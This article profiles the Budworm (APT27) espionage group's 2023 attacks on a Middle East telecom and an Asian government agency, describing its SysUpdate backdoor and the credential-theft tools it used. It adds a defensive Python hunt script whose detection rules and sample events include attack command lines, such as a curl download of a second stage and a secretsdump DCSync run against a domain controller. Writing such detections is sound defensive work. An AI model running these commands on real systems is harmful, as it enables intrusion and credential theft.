The Silent Invader: China’s Budworm Targets Middle East Telecom and Asian Government Entities

Budworm, also tracked as APT27, Bronze Union, Emissary Panda, Iron Tiger, Lucky Mouse and Red Phoenix, is a cyber-espionage group that has been active since at least 2013. It primarily targets organisations in the government, technology and defence sectors, and its intrusions into those sectors are consistently assessed to be espionage rather than financially motivated.

Budworm is widely attributed to China, although no official link to the People’s Republic of China has ever been acknowledged. The attribution rests on the following indicators:

  • Operating hours: the group’s activity clusters within normal working hours in the Chinese time zone (UTC+8).
  • Targets: Budworm has targeted organisations worldwide, including US defence contractors, financial services firms and a national data centre, a target set that aligns with China’s strategic interests.
  • Tools and techniques: the group’s tooling and tradecraft overlap with those of other China-linked cyber-espionage groups.
  • Linguistic indicators: some of Budworm’s tools contain linguistic artefacts pointing to Chinese-speaking developers.

In the August 2023 activity, the group compromised a telecommunications company in the Middle East and a government agency in Asia, deploying an updated version of its SysUpdate toolkit. SysUpdate is a feature-rich backdoor whose capabilities include:

  • List, start, stop and delete services
  • Take screenshots
  • Browse and terminate processes
  • Retrieve drive information
  • Manage files (find, delete, rename, upload and download files, and list directory contents)
  • Execute commands

Alongside SysUpdate, the attackers used a mix of legitimate and publicly available tools to survey the network and harvest credentials. The tools observed in this campaign were:

  • AdFind: a publicly available command-line tool for querying Active Directory. It has legitimate administrative uses, but attackers routinely run it to enumerate the domain and map the network.
  • Curl: an open-source command-line tool for transferring data over a wide range of network protocols; in an intrusion it is commonly used to fetch additional tooling or move data out.
  • SecretsDump: a publicly available tool (part of the Impacket suite) that extracts secrets from a remote machine without deploying an agent. Its techniques include dumping SAM and LSA secrets from the registry, dumping NTLM hashes, recovering plaintext credentials and Kerberos keys, and dumping the NTDS.dit Active Directory database.
  • PasswordDumper: a password-dumping tool.
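Because every tool in the list above is legitimate or public, detection has to key on how they are invoked rather than on a malware signature. The following Python hunt is an added example, not code from Symantec or from the article: it scans constructed process-creation records (field names modelled on Sysmon Event ID 1, which is an assumption about the log source; hostnames, user names and the 198.51.100.23 address are made up) for AdFind, curl and Impacket secretsdump invocations, matching on distinctive command-line switches so that a renamed binary is still caught, and escalates any host that shows AD discovery followed by credential dumping, the sequence seen in this campaign.

```python
"""Hunt for Budworm-style living-off-the-land tooling in process-creation
telemetry. Added example: not code from Symantec or from the article.
The events below are constructed for illustration (198.51.100.0/24 is a
documentation range); field names mirror Sysmon Event ID 1 / EDR
process-creation records as an assumption about the log source."""
import re
from collections import defaultdict

# Constructed process-creation records, NOT real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"ts": "2023-08-14T02:11:05Z", "host": "WS-FIN-07", "user": "CORP\\j.doe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    # AdFind copied to a temp directory and renamed: only the switches give it away.
    {"ts": "2023-08-14T02:12:40Z", "host": "WS-FIN-07", "user": "CORP\\j.doe",
     "image": r"C:\Users\j.doe\AppData\Local\Temp\af.exe",
     "cmdline": "af.exe -f objectcategory=computer -csv name dNSHostName"},
    # curl writing a second-stage file to disk.
    {"ts": "2023-08-14T02:15:02Z", "host": "WS-FIN-07", "user": "CORP\\j.doe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o C:\\ProgramData\\svc.dat http://198.51.100.23/svc.dat"},
    # Impacket secretsdump against a domain controller (-just-dc-ntlm = DCSync-style).
    {"ts": "2023-08-14T02:31:19Z", "host": "WS-FIN-07", "user": "CORP\\j.doe",
     "image": r"C:\Users\Public\python.exe",
     "cmdline": "python.exe secretsdump.py -just-dc-ntlm CORP/j.doe@DC01.corp.local"},
    # An admin running AdFind from an admin workstation: worth a look, but with
    # no credential dumping on the same host it must not escalate.
    {"ts": "2023-08-14T09:00:00Z", "host": "ADMIN-01", "user": "CORP\\dsadmin",
     "image": r"C:\Tools\AdFind.exe",
     "cmdline": "AdFind.exe -sc dclist"},
]

# (rule name, severity, pattern). Patterns run over "<image> <cmdline>" lowercased,
# so a renamed binary is still caught by its distinctive switches (and curl's
# -O collapses to -o). AdFind's -f/-sc and secretsdump's -just-dc/-ntds are real
# switches of those tools.
RULES = [
    ("adfind_binary", 3, re.compile(r"\badfind(\.exe)?\b")),
    ("adfind_args", 3, re.compile(r"-f\s+objectcategory=|-sc\s+(dclist|trustdmp)\b")),
    ("secretsdump", 5, re.compile(r"secretsdump|-just-dc(-ntlm)?\b|\s-ntds\s")),
    ("curl_download_to_disk", 1, re.compile(r"\bcurl(\.exe)?\b.*\s-o\b.*https?://")),
]


def match_event(event):
    """Return [(rule, severity), ...] for one process-creation record."""
    text = f"{event['image']} {event['cmdline']}".lower()
    return [(name, sev) for name, sev, pat in RULES if pat.search(text)]


def hunt(events):
    """Aggregate hits per host and escalate hosts showing the campaign's
    sequence: AD discovery (AdFind) plus credential dumping (secretsdump)."""
    per_host = defaultdict(lambda: {"hits": [], "score": 0, "escalate": False})
    for ev in events:
        for name, sev in match_event(ev):
            h = per_host[ev["host"]]
            h["hits"].append(name)
            h["score"] += sev
    for h in per_host.values():
        seen = set(h["hits"])
        discovery = bool(seen & {"adfind_binary", "adfind_args"})
        h["escalate"] = discovery and "secretsdump" in seen
    return dict(per_host)


if __name__ == "__main__":
    for host, r in sorted(hunt(SAMPLE_EVENTS).items()):
        flag = "ESCALATE" if r["escalate"] else "review"
        print(f"{host:10} score={r['score']:2} {flag:8} {', '.join(r['hits'])}")
```

Run against the sample, WS-FIN-07 escalates (AdFind switches, a curl download and secretsdump on one host) while ADMIN-01 is only flagged for review. In production the per-host correlation should be bounded by a time window and the curl rule tuned to the environment, since curl ships with Windows and is a high-noise indicator on its own; the escalation logic is what keeps the individually weak signals useful.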

Symantec assesses that the attackers were probably stopped at an early stage of the intrusion, because the only malicious activity observed on the infected machines was credential harvesting.

Sources:

https://thehackernews.com/2023/09/china-linked-budworm-targeting-middle.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/budworm-tool-update-telecoms-govt

https://therecord.media/suspected-chinese-hackers-target-telecom-asia-government
